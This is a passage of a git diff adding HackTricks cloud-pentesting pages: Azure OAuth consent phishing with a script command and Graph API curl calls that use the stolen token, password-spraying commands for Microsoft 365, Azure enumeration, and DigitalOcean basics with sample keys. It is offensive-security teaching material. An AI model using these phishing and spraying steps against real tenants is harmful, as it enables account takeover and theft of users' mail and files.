+1. **Domain Registration and Application Hosting**: The attacker registers a domain resembling a trustworthy site, for example, "safedomainlogin.com". Under this domain, a subdomain is created (e.g., "companyname.safedomainlogin.com") to host an application designed to capture authorization codes and request access tokens.
+2. **Application Registration in Azure AD**: The attacker then registers a Multi-Tenant Application in their Azure AD Tenant, naming it after the target company to appear legitimate. They configure the application's Redirect URL to point to the subdomain hosting the malicious application.
+3. **Setting Up Permissions**: The attacker sets up the application with various API permissions (e.g., `Mail.Read`, `Notes.Read.All`, `Files.ReadWrite.All`, `User.ReadBasic.All`, `User.Read`). These permissions, once granted by the user, allow the attacker to extract sensitive information on behalf of the user.
+4. **Distributing Malicious Links**: The attacker crafts a link containing the client id of the malicious application and shares it with targeted users, tricking them into granting consent.
+
+## Example Attack
+
+1. Register a **new application**. It can be only for the current directory if you are using an user from the attacked directory or for any directory if this is an external attack (like in the following image).
+   1. Also set the **redirect URI** to the expected URL where you want to receive the code to the get tokens (`http://localhost:8000/callback` by default).
+
+<figure><img src="../../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
+
+2. Then create an application secret:
+
+<figure><img src="../../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
+
+3. Select API permissions (e.g. `Mail.Read`, `Notes.Read.All`, `Files.ReadWrite.All`, `User.ReadBasic.All`, `User.Read)`
+
+<figure><img src="../../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
+
+4. **Execute the web page (**[**azure\_oauth\_phishing\_example**](https://github.com/carlospolop/azure_oauth_phishing_example)**)** that asks for the permissions:
+
+{% code overflow="wrap" %}
+```bash
+# From https://github.com/carlospolop/azure_oauth_phishing_example
+python3 azure_oauth_phishing_example.py --client-secret <client-secret> --client-id <client-id> --scopes "email,Files.ReadWrite.All,Mail.Read,Notes.Read.All,offline_access,openid,profile,User.Read"
+```
+{% endcode %}
+
+5. **Send the URL to the victim**
+   1. In this case `http://localhost:8000`
+6. **Victims** needs to **accept the prompt:**
+
+<figure><img src="../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
+
+7. Use the **access token to access the requested permissions**:
+
+```bash
+export ACCESS_TOKEN=<ACCESS_TOKEN>
+
+# List drive files
+curl -X GET \
+  https://graph.microsoft.com/v1.0/me/drive/root/children \
+  -H "Authorization: Bearer $ACCESS_TOKEN" \
+  -H "Accept: application/json"
+
+# List eails
+curl -X GET \
+  https://graph.microsoft.com/v1.0/me/messages \
+  -H "Authorization: Bearer $ACCESS_TOKEN" \
+  -H "Accept: application/json"
+
+# List notes
+curl -X GET \
+  https://graph.microsoft.com/v1.0/me/onenote/notebooks \
+  -H "Authorization: Bearer $ACCESS_TOKEN" \
+  -H "Accept: application/json"
+```
+
+## Other Tools
+
+* [**365-Stealer**](https://github.com/AlteredSecurity/365-Stealer)**:** Check [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer) to learn how to configure it.
+* [**O365-Attack-Toolkit**](https://github.com/mdsecactivebreach/o365-attack-toolkit)
+
+## Post-Exploitation
+
+### Phishing Post-Exploitation
+
+Depending on the requested permissions you might be able to **access different data of the tenant** (list users, groups... or even modify settings) and **information of the user** (files, notes, emails...). Then, you can use this permissions to perform those actions.
+
+### Application Post Exploitation
+
+Check the Applications and Service Principal sections of the page:
+
+{% content-ref url="../az-privilege-escalation/az-entraid-privesc/" %}
+[az-entraid-privesc](../az-privilege-escalation/az-entraid-privesc/)
+{% endcontent-ref %}
+
+## References
+
+* [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer)
+* [https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md
new file mode 100644
index 0000000000..2ffc070e9d
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md
@@ -0,0 +1,61 @@
+# Az - Password Spraying
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Password Spray
+
+In **Azure** this can be done against **different API endpoints** like Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, etc.
+
+However, note that this technique is **very noisy** and Blue Team can **easily catch it**. Moreover, **forced password complexity** and the use of **MFA** can make this technique kind of useless.
+
+You can perform a password spray attack with [**MSOLSpray**](https://github.com/dafthack/MSOLSpray)
+
+```powershell
+. .\MSOLSpray\MSOLSpray.ps1
+Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose
+```
+
+Or with [**o365spray**](https://github.com/0xZDH/o365spray)
+
+```bash
+python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com
+```
+
+Or with [**MailSniper**](https://github.com/dafthack/MailSniper)
+
+```powershell
+#OWA
+Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
+#EWS
+Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
+#Gmail
+Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
new file mode 100644
index 0000000000..2d7ddc48fb
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
@@ -0,0 +1,69 @@
+# Az - VMs Unath
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Virtual Machines
+
+For more info about Azure Virtual Machines check:
+
+{% content-ref url="../az-services/vms/" %}
+[vms](../az-services/vms/)
+{% endcontent-ref %}
+
+### Exposed vulnerable service
+
+A network service that is vulnerable to some RCE.
+
+### Public Gallery Images
+
+A public image might have secrets inside of it:
+
+{% code overflow="wrap" %}
+```bash
+# List all community galleries
+az sig list-community --output table
+
+# Search by publisherUri
+az sig list-community --output json --query "[?communityMetadata.publisherUri=='https://3nets.io']"
+```
+{% endcode %}
+
+### Public Extensions
+
+This would be more weird but not impossible. A big company might put an extension with sensitive data inside of it:
+
+```bash
+# It takes some mins to run
+az vm extension image list --output table
+
+# Get extensions by publisher
+az vm extension image list --publisher "Site24x7" --output table
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/README.md b/pentesting-cloud/digital-ocean-pentesting/README.md
new file mode 100644
index 0000000000..66f82c4783
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/README.md
@@ -0,0 +1,67 @@
+# Digital Ocean Pentesting
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+**Before start pentesting** a Digital Ocean environment there are a few **basics things you need to know** about how DO works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
+
+Concepts such as hierarchy, access and other basic concepts are explained in:
+
+{% content-ref url="do-basic-information.md" %}
+[do-basic-information.md](do-basic-information.md)
+{% endcontent-ref %}
+
+## Basic Enumeration
+
+### SSRF
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %}
+
+### Projects
+
+To get a list of the projects and resources running on each of them from the CLI check:
+
+{% content-ref url="do-services/do-projects.md" %}
+[do-projects.md](do-services/do-projects.md)
+{% endcontent-ref %}
+
+### Whoami
+
+```bash
+doctl account get
+```
+
+## Services Enumeration
+
+{% content-ref url="do-services/" %}
+[do-services](do-services/)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md b/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md
new file mode 100644
index 0000000000..6e93e0b752
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md
@@ -0,0 +1,161 @@
+# DO - Basic Information
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+DigitalOcean is a **cloud computing platform that provides users with a variety of services**, including virtual private servers (VPS) and other resources for building, deploying, and managing applications. **DigitalOcean's services are designed to be simple and easy to use**, making them **popular among developers and small businesses**.
+
+Some of the key features of DigitalOcean include:
+
+* **Virtual private servers (VPS)**: DigitalOcean provides VPS that can be used to host websites and applications. These VPS are known for their simplicity and ease of use, and can be quickly and easily deployed using a variety of pre-built "droplets" or custom configurations.
+* **Storage**: DigitalOcean offers a range of storage options, including object storage, block storage, and managed databases, that can be used to store and manage data for websites and applications.
+* **Development and deployment tools**: DigitalOcean provides a range of tools that can be used to build, deploy, and manage applications, including APIs and pre-built droplets.
+* **Security**: DigitalOcean places a strong emphasis on security, and offers a range of tools and features to help users keep their data and applications safe. This includes encryption, backups, and other security measures.
+
+Overall, DigitalOcean is a cloud computing platform that provides users with the tools and resources they need to build, deploy, and manage applications in the cloud. Its services are designed to be simple and easy to use, making them popular among developers and small businesses.
+
+### Main Differences from AWS
+
+One of the main differences between DigitalOcean and AWS is the **range of services they offer**. **DigitalOcean focuses on providing simple** and easy-to-use virtual private servers (VPS), storage, and development and deployment tools. **AWS**, on the other hand, offers a **much broader range of services**, including VPS, storage, databases, machine learning, analytics, and many other services. This means that AWS is more suitable for complex, enterprise-level applications, while DigitalOcean is more suited to small businesses and developers.
+
+Another key difference between the two platforms is the **pricing structure**. **DigitalOcean's pricing is generally more straightforward and easier** to understand than AWS, with a range of pricing plans that are based on the number of droplets and other resources used. AWS, on the other hand, has a more complex pricing structure that is based on a variety of factors, including the type and amount of resources used. This can make it more difficult to predict costs when using AWS.
+
+## Hierarchy
+
+### User
+
+A user is what you expect, a user. He can **create Teams** and **be a member of different teams.**
+
+### **Team**
+
+A team is a group of **users**. When a user creates a team he has the **role owner on that team** and he initially **sets up the billing info**. **Other** user can then be **invited** to the team.
+
+Inside the team there might be several **projects**. A project is just a **set of services running**. It can be used to **separate different infra stages**, like prod, staging, dev...
+
+### Project
+
+As explained, a project is just a container for all the **services** (droplets, spaces, databases, kubernetes...) **running together inside of it**.\
+A Digital Ocean project is very similar to a GCP project without IAM.
+
+## Permissions
+
+### Team
+
+Basically all members of a team have **access to the DO resources in all the projects created within the team (with more or less privileges).**
+
+### Roles
+
+Each **user inside a team** can have **one** of the following three **roles** inside of it:
+
+| Role       | Shared Resources | Billing Information | Team Settings |
+| ---------- | ---------------- | ------------------- | ------------- |
+| **Owner**  | Full access      | Full access         | Full access   |
+| **Biller** | No access        | Full access         | No access     |
+| **Member** | Full access      | No access           | No access     |
+
+**Owner** and **member can list the users** and check their **roles** (biller cannot).
+
+## Access
+
+### Username + password (MFA)
+
+As in most of the platforms, in order to access to the GUI you can use a set of **valid username and password** to **access** the cloud **resources**. Once logged in you can see **all the teams you are part** of in [https://cloud.digitalocean.com/account/profile](https://cloud.digitalocean.com/account/profile).\
+And you can see all your activity in [https://cloud.digitalocean.com/account/activity](https://cloud.digitalocean.com/account/activity).
+
+**MFA** can be **enabled** in a user and **enforced** for all the users in a **team** to access the team.
+
+### API keys
+
+In order to use the API, users can **generate API keys**. These will always come with Read permissions but **Write permission are optional**.\
+The API keys look like this:
+
+```
+dop_v1_1946a92309d6240274519275875bb3cb03c1695f60d47eaa1532916502361836
+```
+
+The cli tool is [**doctl**](https://github.com/digitalocean/doctl#installing-doctl). Initialise it (you need a token) with:
+
+```bash
+doctl auth init # Asks for the token
+doctl auth init --context my-context # Login with a different token
+doctl auth list # List accounts
+```
+
+By default this token will be written in clear-text in Mac in `/Users/<username>/Library/Application Support/doctl/config.yaml`.
+
+### Spaces access keys
+
+These are keys that give **access to the Spaces** (like S3 in AWS or Storage in GCP).
+
+They are composed by a **name**, a **keyid** and a **secret**. An example could be:
+
+```
+Name: key-example
+Keyid: DO00ZW4FABSGZHAABGFX
+Secret: 2JJ0CcQZ56qeFzAJ5GFUeeR4Dckarsh6EQSLm87MKlM
+```
+
+### OAuth Application
+
+OAuth applications can be granted **access over Digital Ocean**.
+
+It's possible to **create OAuth applications** in [https://cloud.digitalocean.com/account/api/applications](https://cloud.digitalocean.com/account/api/applications) and check all **allowed OAuth applications** in [https://cloud.digitalocean.com/account/api/access](https://cloud.digitalocean.com/account/api/access).
+
+### SSH Keys
+
+It's possible to add **SSH keys to a Digital Ocean Team** from the **console** in [https://cloud.digitalocean.com/account/security](https://cloud.digitalocean.com/account/security).
+
+This way, if you create a **new droplet, the SSH key will be set** on it and you will be able to **login via SSH** without password (note that newly [uploaded SSH keys aren't set in already existent droplets for security reasons](https://docs.digitalocean.com/products/droplets/how-to/add-ssh-keys/to-existing-droplet/)).
+
+### Functions Authentication Token
+
+The way **to trigger a function via REST API** (always enabled, it's the method the cli uses) is by triggering a request with an **authentication token** like:
+
+```bash
+curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg="
+```
+
+## Logs
+
+### User logs
+
+The **logs of a user** can be found in [**https://cloud.digitalocean.com/account/activity**](https://cloud.digitalocean.com/account/activity)
+
+### Team logs
+
+The **logs of a team** can be found in [**https://cloud.digitalocean.com/account/security**](https://cloud.digitalocean.com/account/security)
+
+## References
+
+* [https://docs.digitalocean.com/products/teams/how-to/manage-membership/](https://docs.digitalocean.com/products/teams/how-to/manage-membership/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md b/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md
new file mode 100644
index 0000000000..3333a417c4
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md
@@ -0,0 +1,33 @@
+# DO - Permissions for a Pentest
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+DO doesn't support granular permissions. So the **minimum role** that allows a user to review all the resources is **member**. A pentester with this permission will be able to perform harmful activities, but it's what it's.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/README.md b/pentesting-cloud/digital-ocean-pentesting/do-services/README.md
new file mode 100644
index 0000000000..5df4185ea2
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-services/README.md
@@ -0,0 +1,45 @@
+# DO - Services
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+DO offers a few services, here you can find how to **enumerate them:**
+
+* [**Apps**](do-apps.md)
+* [**Container Registry**](do-container-registry.md)
+* [**Databases**](do-databases.md)
+* [**Droplets**](do-droplets.md)
+* [**Functions**](do-functions.md)
+* [**Images**](do-images.md)
+* [**Kubernetes (DOKS)**](do-kubernetes-doks.md)
+* [**Networking**](do-networking.md)
+* [**Projects**](do-projects.md)
+* [**Spaces**](do-spaces.md)
+* [**Volumes**](do-volumes.md)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md
new file mode 100644
index 0000000000..f10dcde2fe
